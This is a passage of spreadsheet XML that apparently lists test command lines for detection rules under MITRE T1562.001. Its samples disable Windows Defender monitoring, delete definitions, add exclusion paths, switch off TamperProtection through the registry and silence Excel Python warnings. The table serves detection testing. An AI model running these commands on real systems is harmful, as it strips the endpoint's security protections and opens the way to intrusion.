        </is>
      </c>
      <c r="D2595" s="43" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E2595" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "rm 'HKCR\*\shellex\ContextMenuHandlers\EPP'" -Verb RunAs</t>
        </is>
      </c>
      <c r="F2595" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2595" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2595" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2595" s="43" t="n"/>
      <c r="J2595" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2595" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2596" ht="15.75" customHeight="1" s="42">
      <c r="A2596" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2596" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_remove_windows_defender_definition</t>
        </is>
      </c>
      <c r="C2596" s="43" t="inlineStr">
        <is>
          <t>Windows Defender Definition Files Removed</t>
        </is>
      </c>
      <c r="D2596" s="43" t="inlineStr">
        <is>
          <t>9719a8aa-401c-41af-8108-ced7ec9cd75c</t>
        </is>
      </c>
      <c r="E2596" s="43" t="inlineStr">
        <is>
          <t>MpCmdRun.exe /RemoveDefinitions /All</t>
        </is>
      </c>
      <c r="F2596" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2596" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2596" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2596" s="43" t="n"/>
      <c r="J2596" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2596" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2597" ht="15.75" customHeight="1" s="42">
      <c r="A2597" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2597" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_remove_windows_defender_definition</t>
        </is>
      </c>
      <c r="C2597" s="43" t="inlineStr">
        <is>
          <t>Windows Defender Definition Files Removed</t>
        </is>
      </c>
      <c r="D2597" s="43" t="inlineStr">
        <is>
          <t>9719a8aa-401c-41af-8108-ced7ec9cd75c</t>
        </is>
      </c>
      <c r="E2597" s="43" t="inlineStr">
        <is>
          <t>MpCmdRun.exe" /RemoveDefinitions /All</t>
        </is>
      </c>
      <c r="F2597" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2597" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2597" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2597" s="43" t="n"/>
      <c r="J2597" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2597" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2598" ht="15.75" customHeight="1" s="42">
      <c r="A2598" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2598" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_mppreference</t>
        </is>
      </c>
      <c r="C2598" s="43" t="inlineStr">
        <is>
          <t>Powershell Base64 Encoded MpPreference Cmdlet</t>
        </is>
      </c>
      <c r="D2598" s="43" t="inlineStr">
        <is>
          <t>c6fb44c6-71f5-49e6-9462-1425d328aee3</t>
        </is>
      </c>
      <c r="E2598" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand "UwBlAHQALQBNAHAARQByAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXAB0AGUAcwB0AA=="</t>
        </is>
      </c>
      <c r="F2598" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2598" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2598" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2598" s="43" t="n"/>
      <c r="J2598" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2598" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2599" ht="15.75" customHeight="1" s="42">
      <c r="A2599" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2599" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_mppreference</t>
        </is>
      </c>
      <c r="C2599" s="43" t="inlineStr">
        <is>
          <t>Powershell Base64 Encoded MpPreference Cmdlet</t>
        </is>
      </c>
      <c r="D2599" s="43" t="inlineStr">
        <is>
          <t>c6fb44c6-71f5-49e6-9462-1425d328aee3</t>
        </is>
      </c>
      <c r="E2599" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-MpPreference -ExclusionPath 'C:\test'"</t>
        </is>
      </c>
      <c r="F2599" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2599" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2599" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2599" s="43" t="n"/>
      <c r="J2599" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2599" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2600" ht="15.75" customHeight="1" s="42">
      <c r="A2600" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2600" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_defender_exclusion</t>
        </is>
      </c>
      <c r="C2600" s="43" t="inlineStr">
        <is>
          <t>Powershell Defender Exclusion</t>
        </is>
      </c>
      <c r="D2600" s="43" t="inlineStr">
        <is>
          <t>17769c90-230e-488b-a463-e05c08e9d48f</t>
        </is>
      </c>
      <c r="E2600" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\\Temp'"</t>
        </is>
      </c>
      <c r="F2600" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2600" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2600" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2600" s="43" t="n"/>
      <c r="J2600" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2600" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2601" ht="15.75" customHeight="1" s="42">
      <c r="A2601" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2601" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_defender_exclusion</t>
        </is>
      </c>
      <c r="C2601" s="43" t="inlineStr">
        <is>
          <t>Powershell Defender Exclusion</t>
        </is>
      </c>
      <c r="D2601" s="43" t="inlineStr">
        <is>
          <t>17769c90-230e-488b-a463-e05c08e9d48f</t>
        </is>
      </c>
      <c r="E2601" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Add-MpPreference -ExclusionPath C:\\Temp\"</t>
        </is>
      </c>
      <c r="F2601" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2601" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2601" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2601" s="43" t="n"/>
      <c r="J2601" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2601" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2602" ht="15.75" customHeight="1" s="42">
      <c r="A2602" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2602" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_defender_exclusion</t>
        </is>
      </c>
      <c r="C2602" s="43" t="inlineStr">
        <is>
          <t>Powershell Defender Exclusion</t>
        </is>
      </c>
      <c r="D2602" s="43" t="inlineStr">
        <is>
          <t>17769c90-230e-488b-a463-e05c08e9d48f</t>
        </is>
      </c>
      <c r="E2602" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-MpPreference -ExclusionPath 'C:\\Temp'"</t>
        </is>
      </c>
      <c r="F2602" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2602" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2602" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2602" s="43" t="n"/>
      <c r="J2602" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2602" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2603" ht="15.75" customHeight="1" s="42">
      <c r="A2603" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2603" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_defender_av_security_monitoring</t>
        </is>
      </c>
      <c r="C2603" s="43" t="inlineStr">
        <is>
          <t>Disable Windows Defender AV Security Monitoring</t>
        </is>
      </c>
      <c r="D2603" s="43" t="inlineStr">
        <is>
          <t>a7ee1722-c3c5-aeff-3212-c777e4733217</t>
        </is>
      </c>
      <c r="E2603" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command Set-MpPreference -DisableBehaviorMonitoring $true</t>
        </is>
      </c>
      <c r="F2603" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2603" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2603" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2603" s="43" t="n"/>
      <c r="J2603" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2603" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2604" ht="15.75" customHeight="1" s="42">
      <c r="A2604" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2604" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_defender_av_security_monitoring</t>
        </is>
      </c>
      <c r="C2604" s="43" t="inlineStr">
        <is>
          <t>Disable Windows Defender AV Security Monitoring</t>
        </is>
      </c>
      <c r="D2604" s="43" t="inlineStr">
        <is>
          <t>a7ee1722-c3c5-aeff-3212-c777e4733217</t>
        </is>
      </c>
      <c r="E2604" s="43" t="inlineStr">
        <is>
          <t>powershell.exe Set-MpPreference -DisableBehaviorMonitoring $true -DisableRuntimeMonitoring $true</t>
        </is>
      </c>
      <c r="F2604" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2604" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2604" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2604" s="43" t="n"/>
      <c r="J2604" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2604" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2605" ht="15.75" customHeight="1" s="42">
      <c r="A2605" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2605" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_defender_av_security_monitoring</t>
        </is>
      </c>
      <c r="C2605" s="43" t="inlineStr">
        <is>
          <t>Disable Windows Defender AV Security Monitoring</t>
        </is>
      </c>
      <c r="D2605" s="43" t="inlineStr">
        <is>
          <t>a7ee1722-c3c5-aeff-3212-c777e4733217</t>
        </is>
      </c>
      <c r="E2605" s="43" t="inlineStr">
        <is>
          <t>powershell.exe Set-MpPreference -DisableBehaviorMonitoring $true | Out-Null</t>
        </is>
      </c>
      <c r="F2605" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2605" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2605" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2605" s="43" t="n"/>
      <c r="J2605" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2605" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2606" ht="15.75" customHeight="1" s="42">
      <c r="A2606" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2606" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_defender_av_security_monitoring</t>
        </is>
      </c>
      <c r="C2606" s="43" t="inlineStr">
        <is>
          <t>Disable Windows Defender AV Security Monitoring</t>
        </is>
      </c>
      <c r="D2606" s="43" t="inlineStr">
        <is>
          <t>a7ee1722-c3c5-aeff-3212-c777e4733217</t>
        </is>
      </c>
      <c r="E2606" s="43" t="inlineStr">
        <is>
          <t>powershell.exe Set-MpPreference -DisableBehaviorMonitoring $true -WarningAction SilentlyContinue</t>
        </is>
      </c>
      <c r="F2606" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2606" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2606" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2606" s="43" t="n"/>
      <c r="J2606" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2606" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2607" ht="15.75" customHeight="1" s="42">
      <c r="A2607" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2607" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_defender_av_security_monitoring</t>
        </is>
      </c>
      <c r="C2607" s="43" t="inlineStr">
        <is>
          <t>Disable Windows Defender AV Security Monitoring</t>
        </is>
      </c>
      <c r="D2607" s="43" t="inlineStr">
        <is>
          <t>a7ee1722-c3c5-aeff-3212-c777e4733217</t>
        </is>
      </c>
      <c r="E2607" s="43" t="inlineStr">
        <is>
          <t>powershell.exe Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction SilentlyContinue</t>
        </is>
      </c>
      <c r="F2607" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2607" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2607" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2607" s="43" t="n"/>
      <c r="J2607" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2607" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2608" ht="15.75" customHeight="1" s="42">
      <c r="A2608" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2608" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_defender_av_security_monitoring</t>
        </is>
      </c>
      <c r="C2608" s="43" t="inlineStr">
        <is>
          <t>Disable Windows Defender AV Security Monitoring</t>
        </is>
      </c>
      <c r="D2608" s="43" t="inlineStr">
        <is>
          <t>a7ee1722-c3c5-aeff-3212-c777e4733217</t>
        </is>
      </c>
      <c r="E2608" s="43" t="inlineStr">
        <is>
          <t>powershell.exe Set-MpPreference -DisableBehaviorMonitoring $true -Verbose</t>
        </is>
      </c>
      <c r="F2608" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2608" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2608" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2608" s="43" t="n"/>
      <c r="J2608" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2608" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2609" ht="15.75" customHeight="1" s="42">
      <c r="A2609" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2609" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_defender_av_security_monitoring</t>
        </is>
      </c>
      <c r="C2609" s="43" t="inlineStr">
        <is>
          <t>Disable Windows Defender AV Security Monitoring</t>
        </is>
      </c>
      <c r="D2609" s="43" t="inlineStr">
        <is>
          <t>a7ee1722-c3c5-aeff-3212-c777e4733217</t>
        </is>
      </c>
      <c r="E2609" s="43" t="inlineStr">
        <is>
          <t>powershell.exe Set-MpPreference -DisableBehaviorMonitoring $true -Debug</t>
        </is>
      </c>
      <c r="F2609" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2609" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2609" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2609" s="43" t="n"/>
      <c r="J2609" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2609" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2610" ht="15.75" customHeight="1" s="42">
      <c r="A2610" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2610" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_ie_features</t>
        </is>
      </c>
      <c r="C2610" s="43" t="inlineStr">
        <is>
          <t>Disabled IE Security Features</t>
        </is>
      </c>
      <c r="D2610" s="43" t="inlineStr">
        <is>
          <t>fb50eb7a-5ab1-43ae-bcc9-091818cb8424</t>
        </is>
      </c>
      <c r="E2610" s="43" t="inlineStr">
        <is>
          <t>New-ItemProperty -Path "HKCU\Software\Microsoft\Internet Explorer\Main" -PropertyType DWord -Name "DisableFirstRunCustomize" -Value 2</t>
        </is>
      </c>
      <c r="F2610" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2610" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2610" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2610" s="43" t="n"/>
      <c r="J2610" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2610" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2611" ht="15.75" customHeight="1" s="42">
      <c r="A2611" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2611" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remove_mppreference</t>
        </is>
      </c>
      <c r="C2611" s="43" t="inlineStr">
        <is>
          <t>Tamper Windows Defender Remove-MpPreference</t>
        </is>
      </c>
      <c r="D2611" s="43" t="inlineStr">
        <is>
          <t>07e3cb2c-0608-410d-be4b-1511cb1a0448</t>
        </is>
      </c>
      <c r="E2611" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Remove-MpPreference -ControlledFolderAccessProtectedFolders 'C:\'"</t>
        </is>
      </c>
      <c r="F2611" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2611" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2611" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2611" s="43" t="n"/>
      <c r="J2611" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2611" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2612" ht="15.75" customHeight="1" s="42">
      <c r="A2612" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2612" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remove_mppreference</t>
        </is>
      </c>
      <c r="C2612" s="43" t="inlineStr">
        <is>
          <t>Tamper Windows Defender Remove-MpPreference</t>
        </is>
      </c>
      <c r="D2612" s="43" t="inlineStr">
        <is>
          <t>07e3cb2c-0608-410d-be4b-1511cb1a0448</t>
        </is>
      </c>
      <c r="E2612" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Remove-MpPreference -ControlledFolderAccessProtectedFolders 'C:\'" -WindowStyle Hidden</t>
        </is>
      </c>
      <c r="F2612" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2612" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2612" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2612" s="43" t="n"/>
      <c r="J2612" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2612" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2613" ht="15.75" customHeight="1" s="42">
      <c r="A2613" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2613" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remove_mppreference</t>
        </is>
      </c>
      <c r="C2613" s="43" t="inlineStr">
        <is>
          <t>Tamper Windows Defender Remove-MpPreference</t>
        </is>
      </c>
      <c r="D2613" s="43" t="inlineStr">
        <is>
          <t>07e3cb2c-0608-410d-be4b-1511cb1a0448</t>
        </is>
      </c>
      <c r="E2613" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Remove-MpPreference -ControlledFolderAccessProtectedFolders C:\"</t>
        </is>
      </c>
      <c r="F2613" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2613" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2613" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2613" s="43" t="n"/>
      <c r="J2613" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2613" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2614" ht="15.75" customHeight="1" s="42">
      <c r="A2614" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2614" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C2614" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D2614" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E2614" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Set-Service -Name Spooler -StartupType $env:StartupTypeValue" --% -StartupTypeValue Disabled</t>
        </is>
      </c>
      <c r="F2614" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2614" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2614" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2614" s="43" t="n"/>
      <c r="J2614" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2614" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2615" ht="15.75" customHeight="1" s="42">
      <c r="A2615" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2615" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_cleanwipe</t>
        </is>
      </c>
      <c r="C2615" s="43" t="inlineStr">
        <is>
          <t>PUA - CleanWipe Execution</t>
        </is>
      </c>
      <c r="D2615" s="43" t="inlineStr">
        <is>
          <t>f44800ac-38ec-471f-936e-3fa7d9c53100</t>
        </is>
      </c>
      <c r="E2615" s="43" t="inlineStr">
        <is>
          <t>CATClean.exe --uninstall</t>
        </is>
      </c>
      <c r="F2615" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2615" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2615" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2615" s="43" t="n"/>
      <c r="J2615" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2615" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2616" ht="15.75" customHeight="1" s="42">
      <c r="A2616" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2616" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_cleanwipe</t>
        </is>
      </c>
      <c r="C2616" s="43" t="inlineStr">
        <is>
          <t>PUA - CleanWipe Execution</t>
        </is>
      </c>
      <c r="D2616" s="43" t="inlineStr">
        <is>
          <t>f44800ac-38ec-471f-936e-3fa7d9c53100</t>
        </is>
      </c>
      <c r="E2616" s="43" t="inlineStr">
        <is>
          <t>not_an_installer.exe</t>
        </is>
      </c>
      <c r="F2616" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2616" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2616" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2616" s="43" t="n"/>
      <c r="J2616" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2616" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2617" ht="15.75" customHeight="1" s="42">
      <c r="A2617" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2617" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_cleanwipe</t>
        </is>
      </c>
      <c r="C2617" s="43" t="inlineStr">
        <is>
          <t>PUA - CleanWipe Execution</t>
        </is>
      </c>
      <c r="D2617" s="43" t="inlineStr">
        <is>
          <t>f44800ac-38ec-471f-936e-3fa7d9c53100</t>
        </is>
      </c>
      <c r="E2617" s="43" t="inlineStr">
        <is>
          <t>NetInstaller.exe -r</t>
        </is>
      </c>
      <c r="F2617" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2617" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2617" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2617" s="43" t="n"/>
      <c r="J2617" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2617" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2618" ht="15.75" customHeight="1" s="42">
      <c r="A2618" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2618" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_defender_exclusion</t>
        </is>
      </c>
      <c r="C2618" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2618" s="43" t="inlineStr">
        <is>
          <t>48917adc-a28e-4f5d-b729-11e75da8941f</t>
        </is>
      </c>
      <c r="E2618" s="43" t="inlineStr">
        <is>
          <t>reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\\Evil" /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2618" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2618" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2618" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2618" s="43" t="n"/>
      <c r="J2618" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2618" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2619" ht="15.75" customHeight="1" s="42">
      <c r="A2619" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2619" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_windows_defender_tamper</t>
        </is>
      </c>
      <c r="C2619" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Registry Key Tampering Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2619" s="43" t="inlineStr">
        <is>
          <t>452bce90-6fb0-43cc-97a5-affc283139b3</t>
        </is>
      </c>
      <c r="E2619" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 00 /f</t>
        </is>
      </c>
      <c r="F2619" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2619" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2619" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2619" s="43" t="n"/>
      <c r="J2619" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2619" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2620" ht="15.75" customHeight="1" s="42">
      <c r="A2620" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2620" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_windows_defender_tamper</t>
        </is>
      </c>
      <c r="C2620" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Registry Key Tampering Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2620" s="43" t="inlineStr">
        <is>
          <t>452bce90-6fb0-43cc-97a5-affc283139b3</t>
        </is>
      </c>
      <c r="E2620" s="43" t="inlineStr">
        <is>
          <t>reg add HKLM\SOFTWARE\Microsoft\Windows Defender\Features /v TamperProtection /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2620" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2620" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2620" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2620" s="43" t="n"/>
      <c r="J2620" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2620" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2621" ht="15.75" customHeight="1" s="42">
      <c r="A2621" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2621" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_office_disable_python_security_warnings</t>
        </is>
      </c>
      <c r="C2621" s="43" t="inlineStr">
        <is>
          <t>Python Function Execution Security Warning Disabled In Excel</t>
        </is>
      </c>
      <c r="D2621" s="43" t="inlineStr">
        <is>
          <t>023c654f-8f16-44d9-bb2b-00ff36a62af9</t>
        </is>
      </c>
      <c r="E2621" s="43" t="inlineStr">
        <is>
          <t>reg.exe add HKCU\Software\Microsoft\Office\16.0\Excel\Security /v PythonFunctionWarnings /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2621" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2621" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2621" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2621" s="43" t="n"/>
      <c r="J2621" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2621" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2622" ht="15.75" customHeight="1" s="42">
      <c r="A2622" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2622" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_office_disable_python_security_warnings</t>
        </is>
      </c>
      <c r="C2622" s="43" t="inlineStr">
        <is>
          <t>Python Function Execution Security Warning Disabled In Excel</t>
        </is>
      </c>
      <c r="D2622" s="43" t="inlineStr">
        <is>
          <t>023c654f-8f16-44d9-bb2b-00ff36a62af9</t>
        </is>
      </c>
      <c r="E2622" s="43" t="inlineStr">
        <is>
